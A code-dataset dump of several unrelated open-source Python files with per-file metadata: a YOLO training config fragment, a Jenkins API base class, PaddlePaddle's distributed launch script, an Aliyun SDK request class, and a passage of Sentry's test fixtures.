CONFIG.TRAIN.CLASS_FOCAL = False
CONFIG.TRAIN.USE_DIOU = False
CONFIG.TRAIN.USE_CIOU = True
# use scale xy to eliminate grid sensitivity
# CONFIG.TRAIN.SCALE_XY = [1.05, 1.1, 1.2]
CONFIG.TRAIN.FREEZE_LAYERS = 249 # freeze 249 layers in YOLOv3
# Augment
CONFIG.AUG = easydict.EasyDict()
CONFIG.AUG.MAX_BOXES = 50
# dataset
CONFIG.DATASET = easydict.EasyDict()
CONFIG.DATASET.MULTIPROCESS = False # windows can not support multiprocessing in python
CONFIG.DATASET.MOSAIC_AUG = False
CONFIG.DATASET.WORKERS = 1
CONFIG.DATASET.MAX_QUEUE = 128
| 28.810811
| 88
| 0.755159
|
883b3e35eb4f7eaf9a23f841c2cac77318e6213b
| 3,542
|
py
|
Python
|
jenkinsapi/jenkinsbase.py
|
Neofonie/jenkinsapi
|
5b523ce3141cb196363abf30d2e3308ec29bb988
|
[
"MIT"
] | null | null | null |
jenkinsapi/jenkinsbase.py
|
Neofonie/jenkinsapi
|
5b523ce3141cb196363abf30d2e3308ec29bb988
|
[
"MIT"
] | null | null | null |
jenkinsapi/jenkinsbase.py
|
Neofonie/jenkinsapi
|
5b523ce3141cb196363abf30d2e3308ec29bb988
|
[
"MIT"
] | null | null | null |
"""
Module for JenkinsBase class
"""
import ast
import pprint
import logging
from jenkinsapi import config
from jenkinsapi.custom_exceptions import JenkinsAPIException
class JenkinsBase(object):
"""
This appears to be the base object that all other jenkins objects are
inherited from
"""
RETRY_ATTEMPTS = 1
def __repr__(self):
return """<%s.%s %s>""" % (self.__class__.__module__,
self.__class__.__name__,
str(self))
def __str__(self):
raise NotImplementedError
def __init__(self, baseurl, poll=True):
"""
Initialize a jenkins connection
"""
self._data = None
self.baseurl = self.strip_trailing_slash(baseurl)
if poll:
self.poll()
def get_jenkins_obj(self):
raise NotImplementedError(
'Please implement this method on %s' % self.__class__.__name__)
def __eq__(self, other):
"""
Return true if the other object represents a connection to the
same server
"""
if not isinstance(other, self.__class__):
return False
if not other.baseurl == self.baseurl:
return False
return True
@classmethod
def strip_trailing_slash(cls, url):
while url.endswith('/'):
url = url[:-1]
return url
def poll(self, tree=None):
data = self._poll(tree=tree)
if 'jobs' in data:
data['jobs'] = self.resolve_job_folders(data['jobs'])
if not tree:
self._data = data
else:
return data
def _poll(self, tree=None):
url = self.python_api_url(self.baseurl)
return self.get_data(url, tree=tree)
def get_data(self, url, params=None, tree=None):
requester = self.get_jenkins_obj().requester
if tree:
if not params:
params = {'tree': tree}
else:
params.update({'tree': tree})
response = requester.get_url(url, params)
if response.status_code != 200:
logging.error('Failed request at %s with params: %s %s',
url, params, tree if tree else '')
response.raise_for_status()
try:
return ast.literal_eval(response.text)
except Exception:
logging.exception('Inappropriate content found at %s', url)
raise JenkinsAPIException('Cannot parse %s' % response.content)
def pprint(self):
"""
Print out all the data in this object for debugging.
"""
pprint.pprint(self._data)
def resolve_job_folders(self, jobs):
for job in list(jobs):
if 'color' not in job.keys():
jobs.remove(job)
jobs += self.process_job_folder(job)
return jobs
def process_job_folder(self, folder):
data = self.get_data(self.python_api_url(folder['url']))
result = []
for job in data.get('jobs', []):
if 'color' not in job.keys():
result += self.process_job_folder(job)
else:
result.append(job)
return result
@classmethod
def python_api_url(cls, url):
if url.endswith(config.JENKINS_API):
return url
else:
if url.endswith(r"/"):
fmt = "%s%s"
else:
fmt = "%s/%s"
return fmt % (url, config.JENKINS_API)
| 28.111111
| 75
| 0.554489
|
015d59b516e94ef0fe322fefda403b7bec7b1804
| 17,913
|
py
|
Python
|
python/paddle/distributed/fleet/launch.py
|
jiansowa/Paddle
|
488152a6d076eac91ef0921ff6e16c65777f814d
|
[
"Apache-2.0"
] | null | null | null |
python/paddle/distributed/fleet/launch.py
|
jiansowa/Paddle
|
488152a6d076eac91ef0921ff6e16c65777f814d
|
[
"Apache-2.0"
] | null | null | null |
python/paddle/distributed/fleet/launch.py
|
jiansowa/Paddle
|
488152a6d076eac91ef0921ff6e16c65777f814d
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
fleetrun is a module that spawns multiple distributed
process on each training node for gpu training and cpu training.
Usage:
In both of single node training or multiple node training, this module
launch a process on each of the given gpu card or cpu machine.
GPU training:
1. for single node training with all visible gpu cards:
fleetrun your_training_py (arg1 arg2 and all others)
2. for single node training with [0,4) cards
fleetrun --gpus="0,1,2,3" your_training_py (arg1 arg2 and all others)
3. for multiple node training such as two node:192.168.0.16, 192.168.0.17
on 192.168.0.16:
fleetrun --ips="192.168.0.16,192.168.0.17" \
your_training_py (arg1 arg2 and all others)
on 192.168.0.17:
fleetrun --ips="192.168.0.16,192.168.0.17" \
your_training_py (arg1 arg2 and all others)
CPU training:
1. for single node training with multi servers and workers:
fleetrun --server_num=2 --worker_num=2 your_training_py (arg1 arg2 and all others)
2. for multiple node training such as two node:192.168.0.16, 192.168.0.17 \
with 2 servers and 4 workers.
on 192.168.0.16:
fleetrun --servers="192.168.0.16:6170,192.168.0.17:6170" \
--workers="192.168.0.16,192.168.0.17,192.168.0.16,192.168.0.17" \
your_training_py (arg1 arg2 and all others)
on 192.168.0.17:
fleetrun --servers="192.168.0.16:6170,192.168.0.17:6171" \
--workers="192.168.0.16,192.168.0.17,192.168.0.16,192.168.0.17" \
your_training_py (arg1 arg2 and all others)
3. use gloo backend for multiple node training such as two node:192.168.0.16, 192.168.0.17 \
with 2 servers and 4 workers. (workers should set port)
on 192.168.0.16:
fleetrun --servers="192.168.0.16:6170,192.168.0.17:6170" \
--workers="192.168.0.16:6171,192.168.0.17:6171,192.168.0.16:6172,192.168.0.17:6172" \
your_training_py (arg1 arg2 and all others)
on 192.168.0.17:
fleetrun --servers="192.168.0.16:6170,192.168.0.17:6170" \
--workers="192.168.0.16:6171,192.168.0.17:6171,192.168.0.16:6172,192.168.0.17:6172" \
your_training_py (arg1 arg2 and all others)
"""
from __future__ import print_function
import shutil
import sys
import tempfile
from sys import version
import subprocess
import os
import time
import six
import copy
from argparse import ArgumentParser, REMAINDER
import paddle
import paddle.fluid as fluid
from paddle.distributed.fleet.launch_utils import *
import paddle.distributed.fleet.cloud_utils as cloud_utils
def _print_arguments(args):
print("----------- Configuration Arguments -----------")
for arg, value in sorted(six.iteritems(vars(args))):
print("%s: %s" % (arg, value))
print("------------------------------------------------")
def _parse_args():
"""
Helper function parsing the command line options
@retval ArgumentParser
"""
parser = ArgumentParser(
description='''start paddle training using multi-process mode.
see: http://www.paddlepaddle.org/documentation/docs/zh/1.6/user_guides/howto/training/cluster_howto.html#permalink-8--nccl2-
''')
# Optional arguments for the launch helper
parser.add_argument(
"--ips",
type=str,
default="127.0.0.1",
help="Paddle cluster nodes ips, such as 192.168.0.16,192.168.0.17..")
parser.add_argument(
"--gpus",
type=str,
default=None,
help="It's for gpu training and the training process will run on the gpus,"
"each process is bound to a single GPU. And if it's not set, this module will use all the gpu cards for training."
)
parser.add_argument(
"--servers", type=str, default="", help="User defined servers ip:port")
parser.add_argument(
"--workers", type=str, default="", help="User defined workers ip:port")
parser.add_argument("--worker_num", type=int, help="number of workers")
parser.add_argument("--server_num", type=int, help="number of servers")
parser.add_argument(
"--log_dir",
type=str,
default="log",
help="The path for each process's log.If it's not set, the log will printed to default pipe."
)
# positional
parser.add_argument(
"training_script",
type=str,
help="The full path to the single GPU training "
"program/script to be launched in parallel, "
"followed by all the arguments for the "
"training script")
# rest from the training program
parser.add_argument('training_script_args', nargs=REMAINDER)
return parser.parse_args()
def get_cluster_from_args(args, gpus):
node_ips = [x.strip() for x in args.ips.split(',')]
if len(node_ips) == 1:
node_ip = node_ips[0]
else:
_, node_ip = get_host_name_ip()
# node_ip = args.node_ip
assert node_ip in node_ips, "Can't find your local ip {%s} in node_ips: {%s}" \
% (node_ip, node_ips)
node_rank = node_ips.index(node_ip)
logger.debug("parsed from args: node_ips:{} node_ip:{} node_rank:{}".format(
node_ips, node_ip, node_rank))
free_ports = None
if not cloud_utils.use_paddlecloud() and len(
node_ips) <= 1 and os.environ.get('FLAGS_START_PORT') is None:
free_ports = find_free_ports(len(gpus))
if free_ports is not None:
free_ports = list(free_ports)
else:
start_port = 6070
if os.environ.get('FLAGS_START_PORT') is not None:
start_port = int(os.environ.get('FLAGS_START_PORT'))
free_ports = [x for x in range(start_port, start_port + len(gpus))]
trainer_endpoints = []
for ip in node_ips:
trainer_endpoints.append(["%s:%d" % (ip, port) for port in free_ports])
return get_cluster(node_ips, node_ip, trainer_endpoints, gpus)
def get_gpus(gpus):
if gpus is None:
gpus_num = fluid.core.get_cuda_device_count()
res_gpus = [str(x) for x in range(0, gpus_num)]
else:
cuda_visible_devices = os.getenv("CUDA_VISIBLE_DEVICES")
if cuda_visible_devices is None or cuda_visible_devices == "":
res_gpus = [x.strip() for x in gpus.split(',')]
else:
# change gpus into relative values
# e.g. CUDA_VISIBLE_DEVICES=4,5,6,7; args.gpus=4,5,6,7;
# therefore gpus=0,1,2,3
cuda_visible_devices_list = cuda_visible_devices.split(',')
for x in gpus.split(','):
assert x in cuda_visible_devices_list, "Can't find "\
"your gpus %s in CUDA_VISIBLE_DEVICES[%s]."\
% (x, cuda_visible_devices)
res_gpus = [
cuda_visible_devices_list.index(x.strip())
for x in gpus.split(',')
]
logger.info("Change selected_gpus into reletive values. --ips:{} "
"will change into relative_ips:{} according to your "
"CUDA_VISIBLE_DEVICES:{}".format(
gpus, res_gpus, cuda_visible_devices_list))
return res_gpus
def launch_collective(args):
# parse arguments, used for cloud-single-machine and local
gpus = get_gpus(args.gpus)
trainers_num = cloud_utils.get_trainers_num()
logger.debug("parsed from args trainerss_num:{} gpus:{}".format(
trainers_num, gpus))
cluster = None
pod = None
start_port = 6170
if os.environ.get('FLAGS_START_PORT') is not None:
start_port = os.environ.get('FLAGS_START_PORT')
if cloud_utils.use_paddlecloud() and trainers_num != 1:
cluster, pod = cloud_utils.get_cloud_cluster(args.ips, gpus, start_port)
logger.debug("get cluster from cloud:{}".format(cluster))
else:
# trainers_num = 1 or not use paddlecloud ips="a,b"
cluster, pod = get_cluster_from_args(args, gpus)
logger.debug("get cluster from args:{}".format(cluster))
global_envs = copy.copy(os.environ.copy())
gloo_rendezvous_dir = tempfile.mkdtemp()
# add gloo env
global_envs["PADDLE_WITH_GLOO"] = "1"
global_envs["PADDLE_GLOO_RENDEZVOUS"] = "3"
global_envs["PADDLE_GLOO_FS_PATH"] = gloo_rendezvous_dir
procs = start_local_trainers(
cluster,
pod,
training_script=args.training_script,
training_script_args=args.training_script_args,
log_dir=args.log_dir,
envs=global_envs)
while True:
alive = watch_local_trainers(procs, cluster.trainers_nranks())
if not alive:
logger.info("Local processes completed.")
logger.debug("POD info:{}".format(pod))
break
time.sleep(3)
if os.path.exists(gloo_rendezvous_dir):
shutil.rmtree(gloo_rendezvous_dir)
def launch_ps(args):
ports = None
start_port = 6170
if args.server_num:
server_num = args.server_num
ports = get_ports(server_num, 0)
server_endpoints = ",".join(["127.0.0.1:" + str(x) for x in ports])
else:
assert args.servers != "", "The setting of CPU mode must be either server_num or servers."
server_endpoints = args.servers
server_endpoints_ips = [
x.strip().split(":")[0] for x in server_endpoints.split(",")
]
server_endpoints_port = [
x.strip().split(":")[1] for x in server_endpoints.split(",")
]
server_num = len(server_endpoints_ips)
if args.worker_num:
worker_num = args.worker_num
ports = get_ports(worker_num, server_num)
worker_endpoints = ",".join(["127.0.0.1:" + str(x) for x in ports])
else:
assert args.workers != "", "The setting of CPU mode must be either worker_num or workers."
worker_endpoints = args.workers
worker_endpoints_ips = [
x.strip().split(":")[0] for x in worker_endpoints.split(",")
]
worker_num = len(worker_endpoints_ips)
node_ips = list(set(server_endpoints_ips + worker_endpoints_ips))
worker_endpoints_len = [
len(x.strip().split(":")) for x in worker_endpoints.split(",")
]
if 1 in worker_endpoints_len:
# if no port value in worker_endpoints, will set default port values.
worker_endpoints_port = range(start_port + server_num,
start_port + server_num + worker_num, 1)
else:
worker_endpoints_port = [
x.strip().split(":")[1] for x in worker_endpoints.split(",")
]
# local train
if len(set(node_ips)) == 1:
current_node_ip = node_ips[0]
else:
_, current_node_ip = get_host_name_ip()
assert current_node_ip in node_ips, "Can't find your local ip {%s} in args.servers and args.workers ips: {%s}" \
% (current_node_ip, node_ips)
node_rank = node_ips.index(current_node_ip)
logger.debug(
"parsed from args: node_ips:{} current_node_ip:{} node_rank:{}, server_ports:{}".
format(node_ips, current_node_ip, node_rank, server_endpoints_port))
cluster = Cluster(hdfs=None)
server_rank = 0
worker_rank = 0
for node_rank, ip in enumerate(node_ips):
pod = Pod()
pod.rank = node_rank
pod.addr = ip
for i in range(len(server_endpoints_ips)):
if ip == server_endpoints_ips[i]:
server = Trainer()
server.endpoint = "%s:%s" % (ip, server_endpoints_port[i])
server.rank = server_rank
server_rank += 1
pod.servers.append(server)
for j in range(len(worker_endpoints_ips)):
if ip == worker_endpoints_ips[j]:
worker = Trainer()
worker.endpoint = "%s:%s" % (ip, worker_endpoints_port[i])
worker.rank = worker_rank
worker_rank += 1
pod.workers.append(worker)
cluster.pods.append(pod)
pod_rank = node_ips.index(current_node_ip)
pod = cluster.pods[pod_rank]
default_env = os.environ.copy()
current_env = copy.copy(default_env)
gloo_rendezvous_dir = tempfile.mkdtemp()
# add gloo env
current_env["PADDLE_WITH_GLOO"] = "1"
current_env["PADDLE_GLOO_RENDEZVOUS"] = "3"
current_env["PADDLE_GLOO_FS_PATH"] = gloo_rendezvous_dir
current_env.pop("http_proxy", None)
current_env.pop("https_proxy", None)
procs = []
cmds = []
log_fns = []
for idx, cur_server in enumerate(pod.servers):
proc_env = {
"PADDLE_PSERVERS_IP_PORT_LIST": server_endpoints,
"PADDLE_TRAINER_ENDPOINTS": worker_endpoints,
"PADDLE_PORT": cur_server.endpoint.split(":")[1],
"TRAINING_ROLE": "PSERVER",
"PADDLE_TRAINERS_NUM": str(worker_num),
"POD_IP": cur_server.endpoint.split(":")[0]
}
current_env.update(proc_env)
cmd = [sys.executable, "-u", args.training_script
] + args.training_script_args
cmds.append(cmd)
if idx == 0:
logger.info(
"Local server start {} processes. First process distributed "
"environment info (Only For Debug): {}".format(
len(pod.servers),
pretty_print_envs(proc_env, ("Distributed Envs", "Value"))))
if args.log_dir is not None:
os.system("mkdir -p {}".format(args.log_dir))
fn = open("%s/serverlog.%d" % (args.log_dir, idx), "w")
log_fns.append(fn)
proc = subprocess.Popen(cmd, env=current_env, stdout=fn, stderr=fn)
else:
proc = subprocess.Popen(cmd, env=current_env)
tp = TrainerProc()
tp.proc = proc
tp.rank = cur_server.rank
tp.local_rank = idx
tp.log_fn = fn
tp.log_offset = fn.tell() if fn else None
tp.cmd = cmd
procs.append(tp)
for idx, cur_worker in enumerate(pod.workers):
proc_env = {
"PADDLE_PSERVERS_IP_PORT_LIST": server_endpoints,
"PADDLE_TRAINER_ENDPOINTS": worker_endpoints,
"PADDLE_TRAINERS_NUM": str(worker_num),
"TRAINING_ROLE": "TRAINER",
"PADDLE_TRAINER_ID": str(cur_worker.rank)
}
current_env.update(proc_env)
cmd = [sys.executable, "-u", args.training_script
] + args.training_script_args
cmds.append(cmd)
if idx == 0:
logger.info(
"Local worker start {} processes. First process distributed "
"environment info (Only For Debug): {}".format(
len(pod.workers),
pretty_print_envs(proc_env, ("Distributed Envs", "Value"))))
if args.log_dir is not None:
os.system("mkdir -p {}".format(args.log_dir))
fn = open("%s/workerlog.%d" % (args.log_dir, idx), "w")
log_fns.append(fn)
proc = subprocess.Popen(cmd, env=current_env, stdout=fn, stderr=fn)
else:
proc = subprocess.Popen(cmd, env=current_env)
tp = TrainerProc()
tp.proc = proc
tp.rank = cur_worker.rank
tp.local_rank = idx
tp.log_fn = fn
tp.log_offset = fn.tell() if fn else None
tp.cmd = cmd
procs.append(tp)
logger.info(
"Please check servers and workers logs in {}/workerlog.* and {}/serverlog.*".
format(args.log_dir, args.log_dir))
# only wait worker to finish here
for i, proc in enumerate(procs):
if i < len(pod.servers):
continue
procs[i].proc.wait()
if len(log_fns) > 0:
log_fns[i].close()
print("all workers exit, going to finish parameter server", file=sys.stderr)
for i in range(len(pod.servers)):
if len(log_fns) > 0:
log_fns[i].close()
procs[i].proc.terminate()
print("all parameter server are killed", file=sys.stderr)
if os.path.exists(gloo_rendezvous_dir):
shutil.rmtree(gloo_rendezvous_dir)
def launch():
args = _parse_args()
logger = get_logger()
_print_arguments(args)
ps_args = ['--worker_num', '--server_num', '--servers', '--workers']
collective_args = ['--ips', '--gpus']
has_ps_args = [
ps_arg for ps_arg in ps_args if ps_arg in " ".join(sys.argv[1:-1])
]
has_collective_args = [
co_arg for co_arg in collective_args
if co_arg in " ".join(sys.argv[1:-1])
]
if fluid.core.is_compiled_with_cuda():
cuda_device_num = fluid.core.get_cuda_device_count()
else:
cuda_device_num = 0
if len(has_ps_args) > 0 or cuda_device_num == 0:
logger.info("Run parameter-sever cpu mode. pserver arguments:{}".format(
has_ps_args))
launch_ps(args)
elif len(has_collective_args) > 0:
logger.info("Run collective gpu mode. gpu arguments:{}, cuda count:{}".
format(has_collective_args, cuda_device_num))
launch_collective(args)
else:
logger.warning(
"Not found distinct arguments. Default use gpu collective mode")
launch_collective(args)
if __name__ == "__main__":
launch()
| 37.39666
| 124
| 0.618713
|
911a936e1f61a8ce19e1396e0c088523cb65a74c
| 1,768
|
py
|
Python
|
aliyun-python-sdk-ccc/aliyunsdkccc/request/v20200701/DeleteSkillGroupRequest.py
|
jorsonzen/aliyun-openapi-python-sdk
|
0afbfa8e5f9e19455695aa799f7dcc1cd853d827
|
[
"Apache-2.0"
] | 1,001
|
2015-07-24T01:32:41.000Z
|
2022-03-25T01:28:18.000Z
|
aliyun-python-sdk-ccc/aliyunsdkccc/request/v20200701/DeleteSkillGroupRequest.py
|
jorsonzen/aliyun-openapi-python-sdk
|
0afbfa8e5f9e19455695aa799f7dcc1cd853d827
|
[
"Apache-2.0"
] | 363
|
2015-10-20T03:15:00.000Z
|
2022-03-08T12:26:19.000Z
|
aliyun-python-sdk-ccc/aliyunsdkccc/request/v20200701/DeleteSkillGroupRequest.py
|
jorsonzen/aliyun-openapi-python-sdk
|
0afbfa8e5f9e19455695aa799f7dcc1cd853d827
|
[
"Apache-2.0"
] | 682
|
2015-09-22T07:19:02.000Z
|
2022-03-22T09:51:46.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from aliyunsdkcore.request import RpcRequest
from aliyunsdkccc.endpoint import endpoint_data
class DeleteSkillGroupRequest(RpcRequest):
def __init__(self):
RpcRequest.__init__(self, 'CCC', '2020-07-01', 'DeleteSkillGroup','CCC')
self.set_method('POST')
if hasattr(self, "endpoint_map"):
setattr(self, "endpoint_map", endpoint_data.getEndpointMap())
if hasattr(self, "endpoint_regional"):
setattr(self, "endpoint_regional", endpoint_data.getEndpointRegional())
def get_InstanceId(self):
return self.get_query_params().get('InstanceId')
def set_InstanceId(self,InstanceId):
self.add_query_param('InstanceId',InstanceId)
def get_SkillGroupId(self):
return self.get_query_params().get('SkillGroupId')
def set_SkillGroupId(self,SkillGroupId):
self.add_query_param('SkillGroupId',SkillGroupId)
def get_Force(self):
return self.get_query_params().get('Force')
def set_Force(self,Force):
self.add_query_param('Force',Force)
| 35.36
| 75
| 0.763575
|
988cfaaf5a73f32e56dd53617c00638401fb9a4c
| 26,620
|
py
|
Python
|
src/sentry/testutils/fixtures.py
|
ygnoh/sentry
|
e34653cac10b63e3c5c732a5c52eaa5bf3484d5b
|
[
"BSD-3-Clause"
] | null | null | null |
src/sentry/testutils/fixtures.py
|
ygnoh/sentry
|
e34653cac10b63e3c5c732a5c52eaa5bf3484d5b
|
[
"BSD-3-Clause"
] | null | null | null |
src/sentry/testutils/fixtures.py
|
ygnoh/sentry
|
e34653cac10b63e3c5c732a5c52eaa5bf3484d5b
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
sentry.testutils.fixtures
~~~~~~~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010-2014 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import, print_function, unicode_literals
import copy
import json
import os
import petname
import random
import six
import warnings
from django.db import IntegrityError, transaction
from django.utils import timezone
from django.utils.text import slugify
from exam import fixture
from hashlib import sha1
from loremipsum import Generator
from uuid import uuid4
from sentry.constants import SentryAppStatus
from sentry.mediators.sentry_apps import Creator as SentryAppCreator
from sentry.mediators.service_hooks import Creator as ServiceHookCreator
from sentry.models import (
Activity, Environment, Event, EventError, EventMapping, Group, Organization, OrganizationMember,
OrganizationMemberTeam, Project, Team, User, UserEmail, Release, Commit, ReleaseCommit,
CommitAuthor, Repository, CommitFileChange, ProjectDebugFile, File, UserPermission, EventAttachment
)
from sentry.utils.canonical import CanonicalKeyDict
loremipsum = Generator()
def make_sentence(words=None):
if words is None:
words = int(random.weibullvariate(8, 3))
return ' '.join(random.choice(loremipsum.words) for _ in range(words))
def make_word(words=None):
if words is None:
words = int(random.weibullvariate(8, 3))
return random.choice(loremipsum.words)
DEFAULT_EVENT_DATA = {
'extra': {
'loadavg': [0.97607421875, 0.88330078125, 0.833984375],
'sys.argv': [
'/Users/dcramer/.virtualenvs/sentry/bin/raven', 'test',
'https://ebc35f33e151401f9deac549978bda11:f3403f81e12e4c24942d505f086b2cad@sentry.io/1'
],
'user':
'dcramer'
},
'modules': {
'raven': '3.1.13'
},
'request': {
'cookies': {},
'data': {},
'env': {},
'headers': {},
'method': 'GET',
'query_string': '',
'url': 'http://example.com',
},
'stacktrace': {
'frames': [
{
'abs_path':
'www/src/sentry/models/foo.py',
'context_line':
' string_max_length=self.string_max_length)',
'filename':
'sentry/models/foo.py',
'function':
'build_msg',
'in_app':
True,
'lineno':
29,
'module':
'raven.base',
'post_context': [
' },', ' })', '',
" if 'stacktrace' in data:",
' if self.include_paths:'
],
'pre_context': [
'', ' data.update({',
" 'stacktrace': {",
" 'frames': get_stack_info(frames,",
' list_max_length=self.list_max_length,'
],
'vars': {
'culprit': 'raven.scripts.runner',
'date': 'datetime.datetime(2013, 2, 14, 20, 6, 33, 479471)',
'event_id': '598fb19363e745ec8be665e6ba88b1b2',
'event_type': 'raven.events.Message',
'frames': '<generator object iter_stack_frames at 0x103fef050>',
'handler': '<raven.events.Message object at 0x103feb710>',
'k': 'logentry',
'public_key': None,
'result': {
'logentry':
"{'message': 'This is a test message generated using ``raven test``', 'params': []}"
},
'self': '<raven.base.Client object at 0x104397f10>',
'stack': True,
'tags': None,
'time_spent': None,
},
},
{
'abs_path':
'/Users/dcramer/.virtualenvs/sentry/lib/python2.7/site-packages/raven/base.py',
'context_line':
' string_max_length=self.string_max_length)',
'filename':
'raven/base.py',
'function':
'build_msg',
'in_app':
False,
'lineno':
290,
'module':
'raven.base',
'post_context': [
' },', ' })', '',
" if 'stacktrace' in data:",
' if self.include_paths:'
],
'pre_context': [
'', ' data.update({',
" 'stacktrace': {",
" 'frames': get_stack_info(frames,",
' list_max_length=self.list_max_length,'
],
'vars': {
'culprit': 'raven.scripts.runner',
'date': 'datetime.datetime(2013, 2, 14, 20, 6, 33, 479471)',
'event_id': '598fb19363e745ec8be665e6ba88b1b2',
'event_type': 'raven.events.Message',
'frames': '<generator object iter_stack_frames at 0x103fef050>',
'handler': '<raven.events.Message object at 0x103feb710>',
'k': 'logentry',
'public_key': None,
'result': {
'logentry':
"{'message': 'This is a test message generated using ``raven test``', 'params': []}"
},
'self': '<raven.base.Client object at 0x104397f10>',
'stack': True,
'tags': None,
'time_spent': None,
},
},
],
},
'tags': [],
'platform': 'python',
}
class Fixtures(object):
@fixture
def projectkey(self):
return self.create_project_key(project=self.project)
@fixture
def user(self):
return self.create_user('admin@localhost', is_superuser=True)
@fixture
def organization(self):
# XXX(dcramer): ensure that your org slug doesnt match your team slug
# and the same for your project slug
return self.create_organization(
name='baz',
slug='baz',
owner=self.user,
)
@fixture
def team(self):
team = self.create_team(
organization=self.organization,
name='foo',
slug='foo',
)
# XXX: handle legacy team fixture
queryset = OrganizationMember.objects.filter(
organization=self.organization,
)
for om in queryset:
OrganizationMemberTeam.objects.create(
team=team,
organizationmember=om,
is_active=True,
)
return team
@fixture
def project(self):
return self.create_project(
name='Bar',
slug='bar',
teams=[self.team],
)
@fixture
def environment(self):
return self.create_environment(
name='development',
project=self.project,
)
@fixture
def group(self):
return self.create_group(message=u'\u3053\u3093\u306b\u3061\u306f')
@fixture
def event(self):
return self.create_event(
event_id='a' * 32,
message=u'\u3053\u3093\u306b\u3061\u306f',
)
@fixture
def activity(self):
return Activity.objects.create(
group=self.group, project=self.project, type=Activity.NOTE, user=self.user, data={}
)
def create_organization(self, name=None, owner=None, **kwargs):
if not name:
name = petname.Generate(2, ' ', letters=10).title()
org = Organization.objects.create(name=name, **kwargs)
if owner:
self.create_member(
organization=org,
user=owner,
role='owner',
)
return org
def create_member(self, teams=None, **kwargs):
kwargs.setdefault('role', 'member')
om = OrganizationMember.objects.create(**kwargs)
if teams:
for team in teams:
self.create_team_membership(
team=team,
member=om,
)
return om
def create_team_membership(self, team, member=None, user=None):
if member is None:
member, _ = OrganizationMember.objects.get_or_create(
user=user,
organization=team.organization,
defaults={
'role': 'member',
}
)
return OrganizationMemberTeam.objects.create(
team=team,
organizationmember=member,
is_active=True,
)
def create_team(self, **kwargs):
if not kwargs.get('name'):
kwargs['name'] = petname.Generate(2, ' ', letters=10).title()
if not kwargs.get('slug'):
kwargs['slug'] = slugify(six.text_type(kwargs['name']))
if not kwargs.get('organization'):
kwargs['organization'] = self.organization
members = kwargs.pop('members', None)
team = Team.objects.create(**kwargs)
if members:
for user in members:
self.create_team_membership(team=team, user=user)
return team
def create_environment(self, **kwargs):
project = kwargs.get('project', self.project)
name = kwargs.get('name', petname.Generate(3, ' ', letters=10)[:64])
env = Environment.objects.create(
organization_id=project.organization_id,
project_id=project.id,
name=name,
)
env.add_project(project)
return env
def create_project(self, **kwargs):
teams = kwargs.pop('teams', None)
if teams is None:
teams = [self.team]
if not kwargs.get('name'):
kwargs['name'] = petname.Generate(2, ' ', letters=10).title()
if not kwargs.get('slug'):
kwargs['slug'] = slugify(six.text_type(kwargs['name']))
if not kwargs.get('organization'):
kwargs['organization'] = teams[0].organization
project = Project.objects.create(**kwargs)
for team in teams:
project.add_team(team)
return project
def create_project_key(self, project):
return project.key_set.get_or_create()[0]
# TODO(maxbittker) make new fixtures less hardcoded
def create_release(self, project, user=None, version=None):
if version is None:
version = os.urandom(20).encode('hex')
release = Release.objects.create(
version=version,
organization_id=project.organization_id,
)
release.add_project(project)
Activity.objects.create(
type=Activity.RELEASE,
project=project,
ident=Activity.get_version_ident(version),
user=user,
data={'version': version},
)
# add commits
if user:
author = self.create_commit_author(project, user)
repo = self.create_repo(project, name='organization-{}'.format(project.slug))
commit = self.create_commit(
project=project,
repo=repo,
author=author,
release=release,
key='deadbeef',
message='placeholder commit message',
)
release.update(
authors=[six.text_type(author.id)],
commit_count=1,
last_commit_id=commit.id,
)
return release
def create_repo(self, project, name=None):
repo = Repository.objects.create(
organization_id=project.organization_id,
name=name or '{}-{}'.format(petname.Generate(2, '',
letters=10), random.randint(1000, 9999)),
)
return repo
def create_commit(self, project, repo, author=None, release=None,
message=None, key=None, date_added=None):
commit = Commit.objects.get_or_create(
organization_id=project.organization_id,
repository_id=repo.id,
key=key or sha1(uuid4().hex).hexdigest(),
defaults={
'message': message or make_sentence(),
'author': author or self.create_commit_author(project),
'date_added': date_added or timezone.now(),
}
)[0]
if release:
ReleaseCommit.objects.create(
organization_id=project.organization_id,
project_id=project.id,
release=release,
commit=commit,
order=1,
)
self.create_commit_file_change(commit, project, '/models/foo.py')
self.create_commit_file_change(commit, project, '/worsematch/foo.py')
self.create_commit_file_change(commit, project, '/models/other.py')
return commit
def create_commit_author(self, project, user=None):
return CommitAuthor.objects.get_or_create(
organization_id=project.organization_id,
email=user.email if user else '{}@example.com'.format(make_word()),
defaults={
'name': user.name if user else make_word(),
}
)[0]
def create_commit_file_change(self, commit, project, filename):
commit_file_change = CommitFileChange.objects.get_or_create(
organization_id=project.organization_id,
commit=commit,
filename=filename,
type='M',
)
return commit_file_change
def create_user(self, email=None, **kwargs):
if email is None:
email = uuid4().hex + '@example.com'
kwargs.setdefault('username', email)
kwargs.setdefault('is_staff', True)
kwargs.setdefault('is_active', True)
kwargs.setdefault('is_superuser', False)
user = User(email=email, **kwargs)
if not kwargs.get('password'):
user.set_password('admin')
user.save()
# UserEmail is created by a signal
assert UserEmail.objects.filter(
user=user,
email=email,
).update(is_verified=True)
return user
def create_useremail(self, user, email, **kwargs):
if not email:
email = uuid4().hex + '@example.com'
kwargs.setdefault('is_verified', True)
useremail = UserEmail(user=user, email=email, **kwargs)
